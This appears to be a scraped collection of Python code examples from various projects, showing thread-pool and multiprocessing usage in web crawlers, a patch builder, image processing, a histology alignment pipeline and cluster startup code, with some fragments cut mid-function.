                        "%s/%s" % (self.temp_directory, result['_name']), "rb")
                    in_buffer = mmap.mmap(in_fd.fileno(),
                                          0,
                                          prot=mmap.PROT_READ)
                    total_bytes += result['size_output']
                    out_fd.write(in_buffer)
                    in_buffer.close()
                    in_fd.close()

            to_file_data = open(to_file, "rb").read()
            to_file_len = len(to_file_data)
            to_file_compressed_len = len(LZG().compress(to_file_data))

            to_file_crc = binascii.crc32(to_file_data)

            patch_information.update({
                "chunk_size":
                self.chunk_size,
                "_name":
                os.path.basename(out_file),
                "size":
                total_bytes,
                "size_patch":
                total_bytes,
                "size_compressed":
                to_file_compressed_len,
                "size_original":
                to_file_len,
                "crc":
                "0x%x" % (to_file_crc & 0xffffffff),
                "gain_vs_original":
                to_file_len - total_bytes,
                "gain_vs_compressed":
                to_file_compressed_len - total_bytes,
                "ratio_vs_original":
                "%0.5f" % (1.0 * total_bytes / to_file_len),
                "ratio_vs_compressed":
                "%0.5f" % (1.0 * total_bytes / to_file_compressed_len),
            })

            if to_file_compressed_len <= total_bytes:
                patch_information["_name"] = os.path.basename(to_file)
                patch_information["size"] = to_file_compressed_len
                patch_information[
                    "gain_vs_original"] = to_file_len - to_file_compressed_len
                patch_information["gain_vs_compressed"] = 0
                patch_information["ratio_vs_original"] = "%0.5f" % \
                    (1.0 *
                     to_file_compressed_len /
                     to_file_len)
                patch_information["ratio_vs_compressed"] = 1
                use_patch = False
            else:
                use_patch = True

            with open(log_file, 'w') as f:
                f.write(json.dumps(patch_information, indent=4,
                                   sort_keys=True))

            if self.verbose:
                print json.dumps(patch_information, indent=4, sort_keys=True)

            return use_patch, patch_information
Code Example #35
File: spider.py Project: aipyth/scrapping
class BaseSpider:
    """
    Basic simple spider

    Right in class you can specify such arguments:
        urls - list of str urls.

        data_handlers - list of data handlers. The data from parsing function goes right there.

        workers - number of workers in the Pool.

    You can overload such functions:
        parse(self, request, html) - parse data here. This method accepts scrapping.requests.Request and bs4.BeautifulSoup arguments.

        get_requests(self) - if you don't have prepared urls to parse find them here and return as scrapping.requests.Request object. Other data types would be ignored.
    """
    workers = 5
    urls = []
    data_handlers = []
    name = None

    def __init__(self, urls=None, name=None, workers=None, data_handlers=None):
        self.urls = urls if urls else self.urls
        self.workers = workers if workers else self.workers
        self.data_handlers = data_handlers if data_handlers else self.data_handlers
        self._stored_requests = []

        self.name = name if name else self.name
        if not self.name:
            self.name = self.__class__.__name__

        # self.logger = logging.getLogger('spider.BaseSpider')
        self.logger = logging.getLogger(self.name)

        # if

    def get_requests(self):
        """
        Use this method to navigate through requests/links

        return/yield:
            scrapping.requests.Request object

        Note: if parsing function is not specified the default one will be used
        """
        return list(map(lambda url: Request(url), self.urls))

    def parse(self, request, html):
        """
        Default parsing function

        return/yield:
            dict with parsed data
            scrapping.requests.Request object
        """
        self.logger.warning("{} for {} parse method empty! Returning None.".format(self.name, request._url))

    def start(self):
        "Starts crawling"
        self.logger.info("{} started!".format(self.name))
        # for storing the data open data handlers
        self.open_data_handlers()

        for request in self.get_requests():
            # check if they are real Request obj and have parser
            if isinstance(request, Request):
                if not request.parser:
                    request.parser = self.parse
                self._stored_requests.append(request)

        self.pool = ThreadPool(self.workers)
        # all requests are parsed in parallel
        ret_items = self.pool.map(self._handle_request, self._stored_requests)
        # print(ret_items)
        # self.logger.debug('here 1 {}'.format(ret_items))
        # wait until the first round is done
        self.pool.close()
        self.pool.join()
        # unpack returned packed objects from pool
        ret_items = self._unpack_packed(ret_items)
        self._save_ret_items_data(ret_items)

        # self.logger.debug('here 2 {}'.format(ret_items))
        # if any other return Request obj handle that
        while any(ret_items):
            # clean the list, only Requests left
            ret_requests = list(filter(lambda item: isinstance(item, Request), ret_items))

            for request in ret_requests:
                if not request.parser:
                    request.parser = self.parse
            self.pool = ThreadPool(self.workers)
            # all requests are parsed in parallel
            ret_items = list(self.pool.map(self._handle_request, ret_requests))
            # unpack returned packed objects from pool
            ret_items = self._unpack_packed(ret_items)
            self._save_ret_items_data(ret_items)
            # wait until this round is done
            self.pool.close()
            self.pool.join()

        self.close_data_handlers()

    def _unpack_packed(self, i):
        "Unpacks all packed urls (lists) in given iterable object"
        for obj in i:
            if isinstance(obj, list):
                i.extend(obj)
                i.remove(obj)
        return i

    def _handle_request(self, request):
        # prepare data to parse and call the parser
        request.join()
        bs_obj = BeautifulSoup(request.text, 'lxml')
        ret = request.parser(request, bs_obj)
        # handle data returned by yield
        if isinstance(ret, types.GeneratorType):
            items = list(filter(lambda item: isinstance(item, dict) or isinstance(item, Request), ret))
            return items
        else:
            return ret if isinstance(ret, dict) or isinstance(ret, Request) else None

    def _save_ret_items_data(self, items):
        "Handle every parsed data in returned sequence"
        for item in items:
            if isinstance(item, dict):
                self.handle_data(item)

    def handle_data(self, data):
        "Gives data to data_handlers"
        self.logger.debug("DATA: {}".format(data))
        for handler in self.data_handlers:
            handler.process(data)

    def open_data_handlers(self):
        for handler in self.data_handlers:
            handler.setUp(self)
            self.logger.debug("Data handler {} set up.".format(handler.__class__.__name__))

    def close_data_handlers(self):
        for handler in self.data_handlers:
            handler.tearDown()
            self.logger.debug("{} closed.".format(handler.__class__.__name__))
Code Example #36
    def fetch_group_time_series(self, time_series_request_list):

        data_frame_agg = None

        time_series_calcs = TimeSeriesCalcs()

        # depends on the nature of operation as to whether we should use threading or multiprocessing library
        if Constants().time_series_factory_thread_technique == "thread":
            from multiprocessing.dummy import Pool
        else:
            # most of the time is spent waiting for Bloomberg to return, so can use threads rather than multiprocessing
            # must use the multiprocessing_on_dill library otherwise can't pickle objects correctly
            # note: currently not very stable
            from multiprocessing_on_dill import Pool

        thread_no = Constants().time_series_factory_thread_no['other']

        if time_series_request_list[0].data_source in Constants(
        ).time_series_factory_thread_no:
            thread_no = Constants().time_series_factory_thread_no[
                time_series_request_list[0].data_source]

        pool = Pool(thread_no)

        # open the market data downloads in their own threads and return the results
        result = pool.map_async(self.fetch_single_time_series,
                                time_series_request_list)
        data_frame_group = result.get()

        pool.close()
        pool.join()

        # data_frame_group = results.get()
        # data_frame_group = results
        # data_frame_group = None

        # import multiprocessing as multiprocessing
        # close the pool and wait for the work to finish

        # processes = []

        # for x in range(0, len(time_series_request_list)):
        #    time_series_request = time_series_request_list[x]
        # processes =   [multiprocessing.Process(target = self.fetch_single_time_series,
        #                                           args = (x)) for x in time_series_request_list]

        # pool.apply_async(tsf.harvest_category, args = (category_desc, environment, freq,
        #             exclude_freq_cat, force_new_download_freq_cat, include_freq_cat))

        # Run processes
        # for p in processes: p.start()

        # Exit the completed processes
        # for p in processes: p.join()

        # collect together all the time series
        if data_frame_group is not None:
            data_frame_group = [i for i in data_frame_group if i is not None]

            if data_frame_group is not None:
                data_frame_agg = time_series_calcs.pandas_outer_join(
                    data_frame_group)

            # for data_frame_single in data_frame_group:
            #     # if you call for returning multiple tickers, be careful with memory considerations!
            #     if data_frame_single is not None:
            #         if data_frame_agg is not None:
            #             data_frame_agg = data_frame_agg.join(data_frame_single, how='outer')
            #         else:
            #             data_frame_agg = data_frame_single

        return data_frame_agg
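Stripped of the commented-out experiments, the download boils down to map_async followed by a blocking get(). The same pattern in isolation, with a stand-in download function:

from multiprocessing.dummy import Pool

def fetch_single(ticker):
    return ticker, len(ticker)              # stand-in for one market-data download

pool = Pool(4)
async_result = pool.map_async(fetch_single, ['EURUSD', 'GBPUSD', 'USDJPY'])
frames = async_result.get(timeout=30)       # blocks until all downloads finish or the timeout hits
pool.close()
pool.join()
print(frames)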
Code Example #37
File: stegosim.py Project: redpack-kr/aletheia
def embed_message(embed_fn, path, payload, output_dir, 
                  embed_fn_saving=False):

    path=utils.absolute_path(path)

    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    output_dir=utils.absolute_path(output_dir)

    # Read filenames
    files=[]
    if os.path.isdir(path):
        for dirpath,_,filenames in os.walk(path):
            for f in filenames:
                path=os.path.abspath(os.path.join(dirpath, f))
                if not utils.is_valid_image(path):
                    print("Warning, please provide a valid image: ", f)
                else:
                    files.append(path)
    else:
        files=[path]
    
    # remove files already generated in a previous execution
    filtered_files = []
    for f in files:
        basename=os.path.basename(f)
        dst_path=os.path.join(output_dir, basename)
        if os.path.exists(dst_path):
            print("Warning! file already exists, ignored:", dst_path)
            continue
        filtered_files.append(f)
    files = filtered_files
    del filtered_files

    def embed(path):
        basename=os.path.basename(path)
        dst_path=os.path.join(output_dir, basename)

        if embed_fn_saving:
            embed_fn(path, payload, dst_path)
        else:
            X=embed_fn(path, payload)
            try:
                scipy.misc.toimage(X, cmin=0, cmax=255).save(dst_path)
            except Exception as e:
                print(str(e))

    # Process thread pool in batches
    batch=1000
    for i in range(0, len(files), batch):
        files_batch = files[i:i+batch]
        n_core=cpu_count()
        print("Using", n_core, "threads")
        pool = ThreadPool(n_core)
        results = pool.map(embed, files_batch)
        pool.close()
        pool.terminate()
        pool.join()

    """
Code Example #38
File: render_batch.py Project: rsau/grow
class RenderLocaleBatch(object):
    """Handles the rendering and threading of the controllers."""

    BATCH_DEFAULT_SIZE = 300  # Default number of documents in a batch.

    def __init__(self, jinja_env, profile, tick=None, batch_size=None):
        self.batch_size = batch_size or self.BATCH_DEFAULT_SIZE
        self.jinja_env = jinja_env
        self.profile = profile
        self.tick = tick
        self.batches = [[]]
        self._is_rendering = False
        self._results = None
        self._thread_pool = None

    def __len__(self):
        count = 0
        for batch in self.batches:
            count = count + len(batch)
        return count

    def _get_batch(self):
        # Ensure that batch is not over the max size.
        batch = self.batches[len(self.batches) - 1]
        if len(batch) >= self.batch_size:
            self.batches.append([])
            batch = self.batches[len(self.batches) - 1]
        return batch

    def add(self, controller, *args, **kwargs):
        """Add an item to be rendered to the batch."""
        batch = self._get_batch()

        batch.append({
            'controller': controller,
            'jinja_env': self.jinja_env,
            'args': args,
            'kwargs': kwargs,
        })

    def render_start(self):
        """Start the batches rendering."""
        self._thread_pool = ThreadPool(len(self.batches))
        self._results = self._thread_pool.imap_unordered(
            render_func, self.batches)
        self._is_rendering = True

    def render_finish(self):
        """Finish in progress batches rendering."""
        if not self._is_rendering:
            raise RenderNotStartedError('Rendering was never started')

        render_errors = []
        rendered_docs = []

        for batch_result in self._results:
            render_errors = render_errors + batch_result.render_errors
            rendered_docs = rendered_docs + batch_result.rendered_docs
            if self.tick:
                for _ in batch_result.render_errors:
                    self.tick()
                for _ in batch_result.rendered_docs:
                    self.tick()
            for result in batch_result.rendered_docs:
                self.profile.add_timer(result.render_timer)

        self._thread_pool.close()
        self._thread_pool.join()
        self._is_rendering = False

        return rendered_docs, render_errors

    def render_sync(self):
        """Syncronous rendering for non-threaded rendering."""
        render_errors = []
        rendered_docs = []

        for batch in self.batches:
            batch_result = render_func(batch, tick=self.tick)
            render_errors = render_errors + batch_result.render_errors
            rendered_docs = rendered_docs + batch_result.rendered_docs

        return rendered_docs, render_errors
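Putting the class together, the intended call sequence is add() per controller, then render_start()/render_finish() for the threaded path (or render_sync() without threads). A minimal sketch, with jinja_env, profile and the controllers left as placeholders for grow internals:

def render_all(jinja_env, profile, controllers):
    """Render every controller in threaded batches and return (docs, errors)."""
    batch = RenderLocaleBatch(jinja_env, profile, batch_size=100)
    for controller in controllers:          # grow render controllers (placeholders here)
        batch.add(controller)
    batch.render_start()                    # one ThreadPool worker per batch
    return batch.render_finish()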
Code Example #39
def get_news_feed(tags_for_feed, blocked_news):

    high_tier = []
    low_tier = []

    feedsize = 9
    tags_for_feed = list(tags_for_feed.items())
    random.shuffle(tags_for_feed)
    tags_for_feed = tags_for_feed[:feedsize]
    mean = sum(x[1] for x in tags_for_feed) / len(tags_for_feed)
    if len(tags_for_feed) >= feedsize:
        for item in tags_for_feed:
            if item[1] > mean:
                high_tier.append(item)
            else:
                low_tier.append(item)
    elif len(tags_for_feed) > 0:
        while len(high_tier) < feedsize:
            high_tier.append(tags_for_feed[random.randint(
                0,
                len(tags_for_feed) - 1)])
    else:
        return

    random.shuffle(low_tier)
    random.shuffle(high_tier)

    tags_for_feed = high_tier + low_tier
    start = time.time()
    pool1 = ThreadPool(len(tags_for_feed))

    urls = pool1.map(GetResponses, tags_for_feed)
    pool1.close()
    pool1.join()

    #forming len
    end = time.time()
    print("get urls from rss", end - start)
    urls_to_parse = []

    start = time.time()

    for i in range(len(urls)):
        res = [i for i in urls[i] if i not in blocked_news]
        if len(res) > 0:
            data = dict()
            data['tag'] = (tags_for_feed[i])[0]
            data['coef'] = (tags_for_feed[i])[1]
            data['url'] = res[0]
            blocked_news.append(res[0])
            urls_to_parse.append(data)

    end = time.time()
    print("form non repeating dict", end - start)

    start = time.time()
    pool2 = ThreadPool(feedsize)

    results = pool2.map(GetTxt, urls_to_parse)

    pool2.close()
    pool2.join()

    end = time.time()

    print("parsing news", end - start)
    SortNewsByInterest(results)
    results = FormUserFeed(results)

    return results
Code Example #40
    def initiate_threads(self):
        _pool = Pool(5)
        _pool.map(traverse_directory, self.valid_directories)
        _pool.close()
        _pool.join()
Code Example #41
File: main.py Project: leymajr/img_agumentor
            if not op:
                print('Unknown operation {}'.format(op_code))
                sys.exit(3)
        op_lists.append(op_list)

    counter = Counter()
    thread_pool = Pool(WORKER_COUNT)
    print('Thread pool initialised with {} worker{}'.format(
        WORKER_COUNT, '' if WORKER_COUNT == 1 else 's'))

    matches = []
    for dir_info in os.walk(image_dir):
        dir_name, _, file_names = dir_info
        print('Processing {}...'.format(dir_name))

        for file_name in file_names:
            if EXTENSION_REGEX.match(file_name):
                if AUGMENTED_FILE_REGEX.match(file_name):
                    counter.skipped_augmented()
                else:
                    process(dir_name, file_name, op_lists)
            else:
                counter.skipped_no_match()

    print("Waiting for workers to complete...")
    thread_pool.close()
    thread_pool.join()

    print(counter.get())
Code Example #42
class Engine(object):
    def __init__(self):
        if settings.IS_DISTRIBUTE:
            self.collector = RedisStatsCollector()
        else:
            self.collector = NormalStatsCollector()
        self.scheduler = Scheduler(self.collector)

        # 实例化四个对象
        self.spiders = self._auto_import_instances(settings.SPIDERS,
                                                   isspider=True)
        # self.scheduler = Scheduler()
        self.downloader = Downloader()
        self.pipelines = self._auto_import_instances(settings.PIPELINES)

        # 实例化中间件
        self.spider_mids = self._auto_import_instances(
            settings.SPIDERS_MIDDLEWARES)
        self.down_mids = self._auto_import_instances(
            settings.DOWNLOADER_MIDDLEWARES)

        # # 记录请求个数和响应个数
        # self.total_request_num = 0
        # self.total_response_num = 0

        # 创建线程池
        self.pool = Pool()
        # 允许递归
        self.is_running = True

    # 动态导包多方法
    def _auto_import_instances(self, path=[], isspider=False):
        '''通过配置文件,动态导入类并实例化
        path: 表示配置文件中配置的导入类的路径
        isspider: 由于爬虫需要返回的是一个字典,因此对其做对应的判断和处理
        '''
        instances = {} if isspider else []
        for p in path:
            module_name = p.rsplit(".", 1)[0]  # 取出模块名称
            cls_name = p.rsplit(".", 1)[1]  # 取出类名称
            ret = importlib.import_module(module_name)  # 动态导入爬虫模块
            cls = getattr(ret, cls_name)  # 根据类名称获取类对象

            if isspider:
                instances[cls.name] = cls()  # 组装成爬虫字典{spider_name:spider(),}
            else:
                instances.append(cls())  # 实例化类对象
                # 把管道中间件分别组装成 管道列表=[管道类1(),管道类2()] / 中间件列表 = [中间件类1(),中间件类2()]
        return instances  # 返回类对象字典或列表

    # 初始化请求对象:入队列
    def _start_requests(self):
        # 1、spider---request--->engine
        def _func(spider_name, spider):
            requests = spider.start_requests()

            for request in requests:
                # 爬虫中间件---request
                for spider_mid in self.spider_mids:
                    request = spider_mid.process_request(request)

                # 给对应的请求对象request绑定自己的爬虫key(可以动态绑定,即为如下)
                request.spider_name = spider_name

                # 2、engine---request--->scheduler
                self.scheduler.add_request(request)
                # 记录请求对象个数
                # self.total_request_num += 1
                self.collector.incr(self.collector.request_nums_key)

        for spider_name, spider in self.spiders.items():
            # 让每一个爬虫都异步执行初始化请求对象:入队列
            self.pool.apply_async(_func, args={spider_name, spider})

    # Take a request off the queue and download/process it
    def execute_request_response_item(self):
        # 3. scheduler---request--->engine
        request = self.scheduler.get_request()
        # bail out if the queue is empty; this also ends the recursive loop
        if request is None:
            return

        # downloader middleware---request
        for down_mid in self.down_mids:
            request = down_mid.process_request(request)
        # 4. engine---request--->downloader
        # 5. downloader---response--->engine
        response = self.downloader.get_response(request)

        # carry the request's meta over to the response
        response.meta = request.meta

        # downloader middleware---response
        for down_mid in self.down_mids:
            response = down_mid.process_response(response)

        # spider middleware---response
        for spider_mid in self.spider_mids:
            response = spider_mid.process_response(response)
        # 6. engine---response--->spider

        # with the spider dict, the spider name on the request maps straight to
        # the right spider, so there is no need to iterate over all spiders
        spider = self.spiders[request.spider_name]

        # resolve the parse method named by the request on that spider
        # for spider in self.spiders:
        parse = getattr(spider, request.parse)
        results = parse(response)

        for result in results:
            # 7. result---engine decides what it is
            if isinstance(result, Request):
                # new request objects must also carry the spider key
                result.spider_name = request.spider_name

                # if it is a request: engine---request--->scheduler
                # new requests go back through the spider middleware
                for spider_mid in self.spider_mids:
                    result = spider_mid.process_request(result)
                self.scheduler.add_request(result)

                # note: count the new request too, because it entered the queue
                # without the engine having counted it above
                # self.total_request_num += 1
                self.collector.incr(self.collector.request_nums_key)
            else:
                # if it is an item: engine---item--->pipeline
                for pipeline in self.pipelines:
                    pipeline.process_item(result, spider)

        # count the response
        # self.total_response_num += 1
        self.collector.incr(self.collector.response_nums_key)

    # Callback for the pool: recursively schedule the next task
    def _callback(self, item):
        if self.is_running:
            self.pool.apply_async(self.execute_request_response_item,
                                  callback=self._callback,
                                  error_callback=self._error_back)

    # Surface exceptions raised in the worker threads
    def _error_back(self, e):
        # print(e)
        logger.exception(e)
        raise e

    def _start(self):
        '''Coordinate the four components'''
        # submit the initial requests to the thread pool
        self.pool.apply_async(self._start_requests,
                              error_callback=self._error_back)

        # the maximum concurrency is set manually here
        for i in range(5):
            # apply_async expects a callable, so do not add parentheses after the method name
            self.pool.apply_async(self.execute_request_response_item,
                                  callback=self._callback,
                                  error_callback=self._error_back)

        # with multiple spiders, check whether any of them run incrementally
        sum_task = sum([spider.time_task for spider in self.spiders.values()])

        while True:
            time.sleep(0.001)
            # self.pool.apply_async(self.execute_request_response_item())
            # only a sum of 0, i.e. no incremental spiders, allows the engine to exit
            if sum_task == 0:
                # because the work is asynchronous, wait until requests have actually been counted
                if self.collector.request_nums != 0:
                    # exit condition: the crawl is finished
                    if self.collector.response_nums + self.collector.repeat_request_nums >= self.collector.request_nums:
                        self.is_running = False
                        break

        self.pool.close()
        self.pool.join()

    # The scheduling logic above is kept private and wrapped here so the run time can be logged
    def start(self):
        start_time = datetime.now()
        self._start()
        end_time = datetime.now()

        logger.info('this is a distribute spider:{}'.format(
            settings.IS_DISTRIBUTE))
        logger.info('the self_async is {}'.format(settings.ASYNC_TYPE))
        logger.info('the spider start at {}'.format(start_time))
        logger.info('the spider end in {}'.format(end_time))
        logger.info("the request's total is {}".format(
            self.collector.request_nums))
        logger.info("the repetitive request's total is {}".format(
            self.collector.repeat_request_nums))
        logger.info("the response's total is {}".format(
            self.collector.response_nums))
        logger.info('the spider pass with {}'.format(
            (end_time - start_time).total_seconds()))

        # clear the counters stored in redis
        self.collector.clear()
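
The engine above keeps its workers busy by re-submitting execute_request_response_item from its own completion callback and stops once the response and duplicate counters catch up with the request counter. Below is a minimal, self-contained sketch of that recursive apply_async/callback pattern; the queue, worker function and counters are illustrative stand-ins, not part of the original engine.

from multiprocessing.dummy import Pool  # thread pool, same flavour as the engine's Pool()
import queue
import time

tasks = queue.Queue()
for n in range(20):
    tasks.put(n)

done = []          # plays the role of the response counter
is_running = True  # plays the role of self.is_running
pool = Pool(4)

def worker():
    # take one task off the queue; an empty queue ends this branch of the recursion
    try:
        n = tasks.get_nowait()
    except queue.Empty:
        return None
    return n * n

def callback(result):
    # each finished task immediately schedules the next one, like _callback() above
    if result is not None:
        done.append(result)
    if is_running and not tasks.empty():
        pool.apply_async(worker, callback=callback)

for _ in range(4):  # initial concurrency, mirroring the range(5) loop in _start()
    pool.apply_async(worker, callback=callback)

while len(done) < 20:  # crude stand-in for the collector-based exit condition
    time.sleep(0.01)

is_running = False
pool.close()
pool.join()
print(sorted(done))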
コード例 #43
0
    g.create_dataset('label_classification', data=classi,dtype=np.uint8)
    g.close()

    return data

data=[]

csv_data = [line.rstrip('\r\n') for line in open('training.csv')]
csv_data = csv_data[1:]

h5_size = 30000
for c,i in enumerate(range(7, 8)): #int(len(csv_data)/h5_size))):
    print(i)
    m = ThreadPool(12)
    data = m.map(load_image_thread, csv_data[(i*h5_size)+1:(i+1)*h5_size+1])
    m.close()

    images = [x[0] for x in data]
    reg = [x[1] for x in data]
    classi = [x[2] for x in data]

    g = h5py.File("h5/training"+str(i+1)+".hdf5", "w")
    g.create_dataset('data', data=images,dtype=np.float32)
    g.create_dataset('label_regression', data=reg,dtype=np.float32)
    g.create_dataset('label_classification', data=classi,dtype=np.uint8)
    g.close()

'''
reste=len(csv_data)-int(len(csv_data)/h5_size)*h5_size

m = ThreadPool(12)
コード例 #44
0
            thread.start()
            for thread in threads:
                thread.join()

    except Exception, e:
        print 'error', str(e)


if __name__ == '__main__':

    # Fill in the parameters: username/password, club ID, club subdomain, and how many pages in total (optional)
    username = '******'
    password = '******'
    clubid = '1166'
    host = 'shlunyu'
    totalPage = 36

    opener = login("http://passport.tiyushe.com/?rc=SSO&ra=login&ajax=1",
                   username, password)
    url = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=member&cid=' + clubid + '&page={0}'
    childUrl = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=add_member&cid={0}&uid={1}'
    filename = 'getData.csv'
    page_pool = ThreadPool(totalPage / 2)
    page_list = []
    for i in range(1, totalPage + 1):
        u = url.format(i)
        page_list.append(u)
    page_pool.map_async(get_list, (page_list))
    page_pool.close()
    page_pool.join()
コード例 #45
0
ファイル: hist_pipeline_gray.py プロジェクト: jungbt/NMB
 def colorize(self, col_out_dir, final_out_dir):
     """
     Transforms the individual channels from Pipeline.color_split using the 
     affine/nonlinear transformation parameters from Pipeline.slice_by_slice_alignment() 
     and the nonlinear volumetric transformation parameters from Pipeline.blockface_to_MRI_alignment()
     Because each transformation is independent of the others, the script will utilize all
     threads provided by the user to transform multiple slices simultaneously.
     See Transform_Wrapper for more information and the transformation code.
     """
     #Feed transformation information to sub-processes through Transform_Wrapper
     out_suf_list = ['Blue', 'Green', 'Red']
     skip_flag = False
     for i, col_vol in enumerate([
             self.hist_NIFTI.Blue_vol, self.hist_NIFTI.Green_vol,
             self.hist_NIFTI.Red_vol
     ]):
         for j in range(len(self.hist_NIFTI.slices)):
             if not os.path.isfile(self.orig_slice_by_slice_loc +
                                   '/color/' + out_suf_list[i] + '/' +
                                   col_vol.slices[j].name):
                 break
         else:
             continue
         break
     else:
         print(
             ' - All Color Channel Split Transformed Files Exist. Utilizing currently existing data.'
         )
         skip_flag = True
     if skip_flag == False:
         print(
             '====================================ATTEMPTING TO MULTITHREAD===================================='
         )
         pool = Pool(processes=self.threads)
         self.hist_NIFTI.Blue_vol.col = 'Blue'
         self.hist_NIFTI.Green_vol.col = 'Green'
         self.hist_NIFTI.Red_vol.col = 'Red'
         for col_vol in [
                 self.hist_NIFTI.Blue_vol, self.hist_NIFTI.Green_vol,
                 self.hist_NIFTI.Red_vol
         ]:
             pool.map(
                 Transform_Wrapper(
                     col_vol, self.hist_transform, self.BF_NIFTI,
                     self.orig_slice_by_slice_loc + '/color/'),
                 list(range(len(self.hist_transform.slices))))
         pool.close()
         pool.join()
     #Load the output color-channel-split stacks and convert them to volumes
     tmp = self.BF_NIFTI
     r = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Red/')
     r.affine_3D = tmp.affine_3D
     r.volumize(self.orig_slice_by_slice_loc +
                '/color/volumes/r_vol.nii.gz')
     g = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Green/')
     g.affine_3D = tmp.affine_3D
     g.volumize(self.orig_slice_by_slice_loc +
                '/color/volumes/g_vol.nii.gz')
     b = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Blue/')
     b.affine_3D = tmp.affine_3D
     b.volumize(self.orig_slice_by_slice_loc +
                '/color/volumes/b_vol.nii.gz')
     #Transform color-split volumes to the MRI space
     self.final_apply_transform(
         self.orig_slice_by_slice_loc + '/color/volumes/b_vol.nii.gz',
         self.orig_slice_by_slice_loc + '/color/volumes/final_b_vol.nii.gz')
     self.final_apply_transform(
         self.orig_slice_by_slice_loc + '/color/volumes/g_vol.nii.gz',
         self.orig_slice_by_slice_loc + '/color/volumes/final_g_vol.nii.gz')
     self.final_apply_transform(
         self.orig_slice_by_slice_loc + '/color/volumes/r_vol.nii.gz',
         self.orig_slice_by_slice_loc + '/color/volumes/final_r_vol.nii.gz')
     #Load transformed and color-split volumes. Merge the channels to create an RGB volume.
     print('Loading RGB')
     r_data = nib.load(self.orig_slice_by_slice_loc +
                       '/color/volumes/final_r_vol.nii.gz').get_data()
     g_data = nib.load(self.orig_slice_by_slice_loc +
                       '/color/volumes/final_g_vol.nii.gz').get_data()
     b_data = nib.load(self.orig_slice_by_slice_loc +
                       '/color/volumes/final_b_vol.nii.gz').get_data()
     print('Merging Channels')
     rgb = np.empty((r_data.shape[0], r_data.shape[1], r_data.shape[2], 3))
     rgb[:, :, :, 0] = b_data
     rgb[:, :, :, 1] = g_data
     rgb[:, :, :, 2] = r_data
     rgb = rgb.astype('u1')
     #Save the RGB Volume
     print('Saving Volume')
     shape_3d = rgb.shape[0:3]
     rgb_dtype = np.dtype([('R', 'u1'), ('G', 'u1'), ('B', 'u1')])
     rgb_typed = rgb.view(rgb_dtype).reshape(shape_3d)
     tmp = nib.load(self.MRI)
     volume = nib.Nifti1Image(rgb_typed, affine=tmp.affine)
     nib.save(volume, final_out_dir + '/RGB_aligned_histology_vol.nii.gz')
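
Transform_Wrapper above is a project-specific callable that Pool.map applies to each slice index, so the underlying pattern is simply "map an object with __call__ over a range of indices". A small illustrative sketch of that pattern (ImageScaler is a made-up stand-in, not part of the pipeline):

from multiprocessing.dummy import Pool

class ImageScaler(object):
    """Stand-in for Transform_Wrapper: configured once, then called per index."""
    def __init__(self, factor):
        self.factor = factor

    def __call__(self, index):
        # pool.map invokes this once per index, each call in a worker thread
        return index * self.factor

if __name__ == '__main__':
    pool = Pool(processes=4)
    results = pool.map(ImageScaler(10), list(range(8)))
    pool.close()
    pool.join()
    print(results)  # [0, 10, 20, 30, 40, 50, 60, 70]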
コード例 #46
0
ファイル: Main.py プロジェクト: OinkHeinz/MoodleDownloader
def main():

	# configure the program to use utf8 encoding
	reload(sys)
	sys.setdefaultencoding('utf8')

	print "#### Welcome to the MoodleDownloader!\n"
	sUsername = raw_input("Enter you username: "******"\n\n"
コード例 #47
0
    def start(self):
        """
        Starts the cluster with the properties given in the
        constructor. It will create the nodes through the configurator
        and delegate all the work to them. After the identifiers of
        all instances are available, it will save the cluster through
        the cluster storage.
        """

        # To not mess up the cluster management we start the nodes in a
        # different thread. In this case the main thread receives the sigint
        # and communicates to the `start_node` thread. The nodes to work on
        # are passed in a managed queue.
        self.keep_running = True

        def sigint_handler(signal, frame):
            """
            Makes sure the cluster is stored, before the sigint results in
            exiting during the node startup.
            """
            log.error("user interruption: saving cluster before exit.")
            self.keep_running = False

        nodes = self.get_all_nodes()
        thread_pool = Pool(processes=len(nodes))
        log.debug("Created pool of %d threads" % len(nodes))
        signal.signal(signal.SIGINT, sigint_handler)

        # Kick off the node startup; the polling loop below is what actually blocks
        result = thread_pool.map_async(self._start_node, nodes)

        while not result.ready():
            result.wait(1)
            if not self.keep_running:
                # the user aborted the start of the cluster. We finish the
                # node that is currently starting and save the status to the
                # storage, so we don't leave unmanaged instances lying around
                log.error("Aborting upon Ctrl-C")
                thread_pool.close()
                thread_pool.join()
                self._storage.dump_cluster(self)
                sys.exit(1)

        # dump the cluster here, so we don't lose any knowledge
        self._storage.dump_cluster(self)

        signal.alarm(0)

        def sigint_reset(signal, frame):
            sys.exit(1)

        signal.signal(signal.SIGINT, sigint_reset)

        # check if all nodes are running, stop all nodes if the
        # timeout is reached
        def timeout_handler(signum, frame):
            raise TimeoutError(
                "problems occured while starting the nodes, "
                "timeout `%i`", Cluster.startup_timeout)

        signal.signal(signal.SIGALRM, timeout_handler)
        signal.alarm(Cluster.startup_timeout)

        starting_nodes = self.get_all_nodes()
        try:
            while starting_nodes:
                starting_nodes = [
                    n for n in starting_nodes if not n.is_alive()
                ]
                if starting_nodes:
                    time.sleep(10)
        except TimeoutError as timeout:
            log.error("Not all nodes were started correctly within the given"
                      " timeout `%s`" % Cluster.startup_timeout)
            for node in starting_nodes:
                log.error("Stopping node `%s`, since it could not start "
                          "within the given timeout" % node.name)
                node.stop()
                self.remove_node(node)

        signal.alarm(0)

        # If we reached this point, we should have IP addresses for
        # the nodes, so update the storage file again.
        self._storage.dump_cluster(self)

        # Try to connect to each node. Run the setup action only when
        # we successfully connect to all of them.
        signal.signal(signal.SIGALRM, timeout_handler)
        signal.alarm(Cluster.startup_timeout)
        pending_nodes = self.get_all_nodes()[:]

        try:
            while pending_nodes:
                for node in pending_nodes[:]:
                    if node.connect():
                        log.info("Connection to node %s (%s) successful.",
                                 node.name, node.ip_public)
                        pending_nodes.remove(node)
                if pending_nodes:
                    time.sleep(5)

        except TimeoutError:
            # remove the pending nodes from the cluster
            log.error("Could not connect to all the nodes of the "
                      "cluster within the given timeout `%s`." %
                      Cluster.startup_timeout)
            for node in pending_nodes:
                log.error("Stopping node `%s`, since we could not connect to"
                          " it within the timeout." % node.name)
                node.stop()
                self.remove_node(node)

        signal.alarm(0)

        # A lot of things could go wrong when starting the cluster. To
        # ensure a stable cluster fitting the needs of the user in terms of
